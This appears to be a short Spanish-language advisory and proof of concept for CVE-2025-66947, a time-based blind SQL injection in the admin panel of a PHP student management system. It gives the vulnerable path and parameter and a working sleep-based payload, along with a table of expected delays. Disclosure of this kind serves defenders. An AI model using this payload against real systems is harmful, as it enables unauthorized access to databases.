
Prueba de concepto para inyección SQL ciega basada en tiempo en un panel de administración PHP. Demuestra la explotación mediante un parámetro GET sin sanitizar, con orientación de mitigación para uso defensivo.
⏱️ Comparación visual: respuesta normal vs respuesta retardada ~6s
TL;DR: Un parámetro GET en un módulo administrativo permite inyección SQL basada en tiempo mediante retardos en la respuesta.
Existe una 𝗶𝗻𝘆𝗲𝗰𝗰𝗶ó𝗻 𝗦𝗤𝗟 𝗰𝗶𝗲𝗴𝗮 𝗯𝗮𝘀𝗮𝗱𝗮 𝗲𝗻 𝘁𝗶𝗲𝗺𝗽𝗼 en krishanmuraiji SMS v1.0 debido a una validación incorrecta de un parámetro GET en un módulo administrativo.
/studentms/admin/edit-class-detail.phpeditid (GET)/studentms/admin/edit-class-detail.php?editid=12
/studentms/admin/edit-class-detail.php?editid=12*if(now()=sysdate(),sleep(6),0)
| Payload | Retardo |
|---|---|
sleep(3) | ~3s |
sleep(6) | ~6s |
sleep(15) | ~15s |
Retardo consistente = Inyección SQL Confirmada
Este patrón de vulnerabilidad aparece comúnmente en:
Incluso cuando se requiere autenticación y los errores están ocultos,
la inyección SQL basada en tiempo sigue siendo explotable y peligrosa.
Gravedad: Alta
CVE-2025-66947
Ranjan KumarEsta PoC se proporciona únicamente con fines educativos y defensivos.
CVE-2025-66947, SQL Injection, Inyección SQL ciega basada en tiempo, PHP, Panel de administración